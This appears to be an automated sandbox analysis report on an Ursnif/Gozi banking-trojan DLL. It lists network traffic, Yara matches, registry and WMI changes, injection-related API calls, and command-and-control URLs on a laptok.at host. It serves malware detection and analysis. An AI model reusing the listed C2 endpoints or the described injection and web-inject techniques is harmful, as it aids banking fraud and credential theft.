HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 15 Feb 2021 23:58:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30

Source: regsvr32.exe, 00000002.00000003.779376557.000000000362E000.00000004.00000001.sdmp, explorer.exe, 00000020.00000000.850009124.000000000FCFE000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/_2FrbYdUuuog2_2Ft/o0Q4kJ3uiNvB/BVkhCT_2FjP/kgnCFaoGSZ_2FP/XoK_2BtWhs_2FN
Source: explorer.exe, 00000020.00000000.850009124.000000000FCFE000.00000004.00000001.sdmp	String found in binary or memory: http://api10.laptok.at/api1/soyCaKjlo/B74XWyII6dEV1I0Co4Ut/l9VT5RjBdu9gqXWslrY/xc_2FK3McGJ0IzvFP1vJk
Source: powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txt
Source: powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp	String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: powershell.exe, 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp	String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000017.00000002.859665043.000001F6C8B31000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 00000020.00000002.1020876214.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000017.00000003.858426776.000001F6E137C000.00000004.00000001.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000017.00000002.860212545.000001F6C8D40000.00000004.00000001.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000017.00000002.887499451.000001F6D8B95000.00000004.00000001.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000020.00000000.844032000.000000000A897000.00000004.00000001.sdmp	String found in binary or memory: https://www.msn.com/de-ch/?ocid=iehp

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49763 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.4:49762 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5424, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5876, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756834396.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.757094154.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.765016021.0000000005DAB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756986766.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.757116216.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756877993.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.757051571.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756945473.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.825598679.0000000003470000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.845341823.0000000003430000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.756743295.0000000005F28000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5424, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3424, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 5876, type: MEMORY

Disables SPDY (HTTP compression, likely to perform web injects)

Show sources

Source: C:\Windows\explorer.exe

Registry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000021.00000003.833217497.0000018E99E50000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000025.00000002.1022176574.000001DA4C29E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000023.00000003.846762687.000001E7A4180000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000020.00000003.843217682.0000000002B30000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000022.00000002.1023033064.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000021.00000002.847443722.0000000000DDE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000023.00000002.848064727.000001E7A436E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT
Source: 00000024.00000002.1023629573.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Win32.Gozi Author: CCN-CERT

Writes or reads registry keys via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Writes registry values via WMI

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exe	WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_033F4F73 GetProcAddress,NtCreateSection,memset,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_033F11A9 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_033F34D0 NtMapViewOfSection,
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_033FB159 NtQueryVirtualMemory,
Source: C:\Windows\explorer.exe	Code function: 32_2_04DAC458 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA1C74 NtQuerySystemInformation,
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC9584 NtReadVirtualMemory,
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA7D44 NtQueryInformationProcess,
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC1EEC NtCreateSection,
Source: C:\Windows\explorer.exe	Code function: 32_2_04DAF640 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,
Source: C:\Windows\explorer.exe	Code function: 32_2_04DBEF14 NtMapViewOfSection,
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCF9A4 NtAllocateVirtualMemory,
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCC130 NtWriteVirtualMemory,
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB1A9C RtlAllocateHeap,NtQueryInformationProcess,
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB2BD8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC9B4C NtQueryInformationProcess,
Source: C:\Windows\explorer.exe	Code function: 32_2_04DE1002 NtProtectVirtualMemory,NtProtectVirtualMemory,
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DCF9A4 NtAllocateVirtualMemory,
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DCC130 NtWriteVirtualMemory,
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB1A9C NtQueryInformationProcess,
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB2BD8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC9B4C NtQueryInformationProcess,
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DAC458 RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC9584 NtReadVirtualMemory,
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC1EEC NtCreateSection,
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DAF640 NtQueryInformationToken,NtQueryInformationToken,NtClose,
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DBEF14 NtMapViewOfSection,
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DE1002 NtProtectVirtualMemory,NtProtectVirtualMemory,
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4359B4C NtQueryInformationProcess,
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A433F640 NtQueryInformationToken,NtQueryInformationToken,NtClose,
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4371002 NtProtectVirtualMemory,NtProtectVirtualMemory,

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_033FAF34
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 2_2_033F28E9
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA74A8
Source: C:\Windows\explorer.exe	Code function: 32_2_04DAC458
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC9C04
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB3438
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB7500
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA3F98
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB5890
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB2854
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA42CC
Source: C:\Windows\explorer.exe	Code function: 32_2_04DBAACC
Source: C:\Windows\explorer.exe	Code function: 32_2_04DAEBD0
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB6B80
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB44FC
Source: C:\Windows\explorer.exe	Code function: 32_2_04DADC88
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC1C68
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCD468
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC7DDC
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA559C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC75B4
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC15A0
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC0D40
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCED7C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA9514
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB1D14
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA1D20
Source: C:\Windows\explorer.exe	Code function: 32_2_04DBBE9C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCEFD0
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB97C8
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB4F5C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DBEF7C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB2F1C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA78F0
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCE09C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB386C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB206C
Source: C:\Windows\explorer.exe	Code function: 32_2_04DBE808
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCE038
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB11DC
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA49BC
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC0294
Source: C:\Windows\explorer.exe	Code function: 32_2_04DCFA10
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC6A28
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC2BD8
Source: C:\Windows\explorer.exe	Code function: 32_2_04DC53D4
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB3BF4
Source: C:\Windows\explorer.exe	Code function: 32_2_04DA2B40
Source: C:\Windows\explorer.exe	Code function: 32_2_04DB0304
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB5890
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB6B80
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DAC458
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DA78F0
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DCE09C
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB2854
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB386C
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB206C
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DBE808
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DCE038
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB11DC
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DA49BC
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DA42CC
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DBAACC
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC0294
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DCFA10
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC6A28
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC2BD8
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC53D4
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DAEBD0
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB3BF4
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DA2B40
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB0304
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB44FC
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DADC88
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DA74A8
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC1C68
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DCD468
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC9C04
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB3438
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC7DDC
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DA559C
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC75B4
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC15A0
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DC0D40
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DCED7C
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DA9514
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB1D14
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB7500
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DA1D20
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DBBE9C
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DCEFD0
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB97C8
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DA3F98
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB4F5C
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DBEF7C
Source: C:\Windows\System32\control.exe	Code function: 33_2_00DB2F1C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4346B80
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4345890
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A43349BC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A43411DC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4356A28
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A435FA10
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4350294
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4340304
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A434AACC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A43342CC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4332B40
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4359C04
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4343BF4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4352BD8
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A43553D4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A433EBD0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4343438
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4351C68
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A435D468
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A433C458
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A43374A8
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A433DC88
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A43444FC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4347500
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4350D40
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4331D20
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4341D14
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4339514
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A435ED7C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A43575B4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A433559C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A43515A0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4357DDC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A434BE9C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4342F1C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A434EF7C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4344F5C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4333F98
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A43497C8
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A435EFD0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A435E038
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A434E808
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A434206C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A434386C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A4342854
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A435E09C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001E7A43378F0

Source: gayi4abp.dll.26.dr	Static PE information: No import functions for PE file found
Source: wi0gyoxl.dll.28.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Source: SecuriteInfo.com.Generic.mg.f76b81b0397ae313.dll

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL

Source: 00000017.00000003.823839422.000001F6E1200000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000020.00000002.1032085877.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY	Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
